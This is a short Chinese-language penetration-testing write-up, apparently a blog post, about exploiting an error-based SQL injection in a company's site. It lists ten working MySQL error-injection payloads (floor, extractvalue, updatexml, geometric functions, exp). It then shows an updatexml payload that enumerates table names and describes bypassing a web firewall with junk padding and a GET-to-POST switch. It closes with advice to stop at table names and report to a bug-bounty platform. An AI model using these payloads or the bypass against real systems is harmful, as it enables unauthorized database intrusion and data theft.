对某个企业进行渗透测试
发现有报错注入
拓展一下10种报错注入的方式
1.floor()
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
2.extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5.multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6.polygon()
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
7.multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
8.linestring()
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
9.multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
10.exp()
select * from test where id=1 and exp(~(select * from(select user())a));
我们选择update报错注入
查看表
updatexml(1,concat(0x7e,(SELECT group_concat(table_name)from information_schema.tables where table_schema=database()),0x7e),1)-- -
被拦截,想想怎么绕过
后来想到加垃圾数据
加入下面生成的垃圾数据,但是414了,get传不了这么长的数据
生成的垃圾数据
抓包
GET改成POST
注入数据放在后面
send
获取到表名
小贴士
对网站做渗透测试,不要拿数据,能证明有sql注入洞,并且有危害就行了,所以大家做测试的时候拿到表名就可以交补天了
